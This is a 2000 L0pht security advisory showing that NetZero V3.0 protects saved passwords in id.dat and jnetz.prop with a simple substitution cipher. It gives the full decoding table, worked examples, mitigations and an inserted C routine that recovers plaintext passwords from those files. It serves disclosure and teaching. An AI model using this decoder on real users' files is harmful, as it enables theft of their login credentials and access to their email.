
l0pht.00-07-18.netzero

Posted Jul 25, 2000
Authored by Brian Carrier | Site l0pht.com

L0pht Security Advisory - Passwords can be easily decrypted by exploiting NetZero's encryption algorithm. Includes proof of concept code to decode the password stored in jnetz.prop.

tags | proof of concept
SHA-256 | 18ccbc25607e0b2335bd76b829e896cac1e0716922f3dfbdd160e52c8cc11c82


@Stake Inc.
L0pht Research Labs

www.atstake.com www.L0pht.com


Security Advisory


Advisory Name: NetZero Password Encryption Algorithm
Release Date: 07.18.2000
Application: NetZero V3.0 and earlier
Platform: Microsoft Windows 95, 98, NT, 2000
Severity: Low. Passwords can be easily decrypted by
exploiting NetZero's encryption algorithm
Author: Brian Carrier [bcarrier@atstake.com]
Vendor Status: Vendor Contacted 6.19.00
Web: http://www.L0pht.com/advisories.html

Foreword:
It is unfortunately common practice that applications which allow
users to remember their passwords as a convenience rarely encrypt them
but instead opt to simply obfuscate them. This does not alter the fact
that user perception and expectation, for the majority of users at least,
is often incorrectly set. Often times convenience eschews security in
these products.

There are dozens of applications available that make this same mistake.
This advisory is not an attempt to single one vendor out but rather to
continue to remind readers of the common problem of storing secrets and the
reliance on simple obfuscation. If effort is taken to obfuscate or hide
something then it must have been seen as valuable to someone. If not,
why bother? Much the way buffer overflows abound so do simple obfuscation
mechanisms. As such, it is important to continue to bring them to light.

Unfortunately it is often the case that the average user places
as much trust in these as stronger systems through the apparent similarity
in user interface. As suggested by Aleph1, the MS CryptoAPI
CryptProtectData() and CryptUnprotectData() functions currently allow
applications to store secrets encrypted, based on the user's credentials.
Therefore, since the methods currently exist for secure data storage, they
should be utilized by all applications to provide users with a consistent
level of protection.

This advisory is designed to help people see ways of looking at, and
for, these sorts of problems. Or even in being aware of the situation,
to view it as a non-problem. Teaching someone to fish rather than simply
providing one meal. Enjoy the classical substitution cipher :)

Overview:
NetZero is a service that provides free Internet access to customers
in exchange for the permission to advertise. NetZero's users log into the
network with a login and password that are saved in an ASCII text file on
the user's system. This advisory addresses a weak encryption algorithm
that is used to protect the password from unauthorized access.

In order for a NetZero account to be compromised, an attacker must
have access to the machine or use another vulnerability to read the file.
Once access is obtained, the attacker can easily determine the user's
NetZero login and password in less than a second's time. Once the login
and password have been determined, the attacker can read the user's email
and attack other systems under the user's identity.

This is a common problem in many services of this type. One quick
solution to at least minimize the problem, should this risk be deemed
unacceptable, is to disable the _Save Password_ option.

Detailed Description:
The login and password that are required to log into the NetZero
network are stored in an ASCII file, id.dat, in the NetZero directory.
If the user chooses to have the application save the password, then
jnetz.prop also contains the login and password. The password in both
files is encrypted using a variation of a simple substitution cipher.

The classical substitution cipher is a 1-to-1 mapping between
characters where each plaintext character is replaced by one ciphertext
character. For example, let P_i be the plaintext character in location
'i' and C_j be the ciphertext character in location 'j', then C_i is the
character that P_i maps to.

The NetZero substitution cipher replaces each plaintext character by
two ciphertext characters, but the two ciphertext characters are not
stored together. When substituting character P_i of a password of length
'n', the first ciphertext character is C_i and the second character is
C_(n+i).

The two ciphertext characters are derived from the following table:
  |  1  a  M  Q  f  7  g  T  9  4  L  W  e  6  y  C
--+-------------------------------------------------
g |  `  a  b  c  d  e  f  g  h  i  j  k  l  m  n  o
T |  p  q  r  s  t  u  v  w  x  y  z  {  |  }  ~
f |  @  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O
7 |  P  Q  R  S  T  U  V  W  X  Y  Z  [  \  ]  ^  _
Q |  0  1  2  3  4  5  6  7  8  9  :  ;  <  =  >  ?
M | SP  !  "  #  $  %  &  '  (  )  *  +  ,  -  .  /

The characters inside the table represent the ASCII plaintext characters
and SP represents a space.

When encrypting a string, P, of length 'n', find each character in the
table and place the column header into C_i and place the row header into
C_(n+i).

For example:
E(a) = ag
E(aa) = aagg
E(aqAQ1!) = aaaaaagTf7QM
E(`abcdefghijklmno) = 1aMQf7gT94LWe6yCgggggggggggggggg

When decrypting a string, C, of length '2n', then P_i will be the
element in the above table where the column headed by C_i and the row
headed by C_(n+i) intersect.

For example:
D(af) = A
D(aaff) = AA
D(aaMMQQfgfgfg) = AaBbCc
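
The table above is laid out in ASCII order, so each row header stands for the
high nibble of the character code and each column header for the low nibble;
no key is involved at any point. The sketch below is an added example (not the
advisory's netzero.c) that implements the mapping both ways and rejects
malformed input; the names nz_encode, nz_decode, COLS and ROWS are assumptions
made for this illustration.

```c
#include <stdio.h>
#include <string.h>

/* Added illustration; all names are hypothetical. COLS holds the table's
   column headers: index = low nibble of the ASCII code. */
static const char COLS[] = "1aMQf7gT94LWe6yC";
/* Row headers M,Q,f,7,g,T ordered by ASCII high nibble 2..7. */
static const char ROWS[] = "MQf7gT";

/* Encode printable ASCII (0x20-0x7e); out needs 2n+1 bytes. Returns 0 or -1. */
int nz_encode(const char *plain, char *out)
{
    size_t n = strlen(plain);
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)plain[i];
        if (c < 0x20 || c > 0x7e)
            return -1;                       /* character not in the table */
        out[i] = COLS[c & 0x0f];             /* C_i: column header */
        out[n + i] = ROWS[(c >> 4) - 2];     /* C_(n+i): row header */
    }
    out[2 * n] = '\0';
    return 0;
}

/* Decode a 2n-character string; out needs n+1 bytes. Returns 0 or -1. */
int nz_decode(const char *cipher, char *out)
{
    size_t len = strlen(cipher), n = len / 2;
    if (len % 2 != 0) return -1;             /* halves must be equal length */
    for (size_t i = 0; i < n; i++) {
        const char *col = strchr(COLS, cipher[i]);
        const char *row = strchr(ROWS, cipher[n + i]);
        if (!col || !row)
            return -1;                       /* not a table header */
        int c = (int)(((row - ROWS + 2) << 4) | (col - COLS));
        if (c > 0x7e) return -1;             /* empty cell: row T, column C */
        out[i] = (char)c;
    }
    out[n] = '\0';
    return 0;
}

int main(void)
{
    char buf[64];
    if (nz_decode("aaMMQQfgfgfg", buf) == 0) printf("D = %s\n", buf);
    if (nz_encode("aqAQ1!", buf) == 0) printf("E = %s\n", buf);
    return 0;
}
```

The two calls in main() use the advisory's own example strings.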


Temporary Solution:
Exploitation of this vulnerability is only possible once an attacker
has gained access to the id.dat or jnetz.prop files. Therefore, NetZero
users should not have the application save their password and they should
delete the id.dat file every time they start the application.


Vendor Response:
Vendor has acknowledged receipt of the advisory and has not provided
a response as to any actions they intend to take.

Proof-of-Concept Code:
The following code will demonstrate that the password is easily
decrypted. Simply uudecode, compile, and run in a directory that contains
jnetz.prop.


bcarrier@atstake.com

[ For more advisories check out http://www.l0pht.com/advisories.html ]
L-ZERO-P-H-T
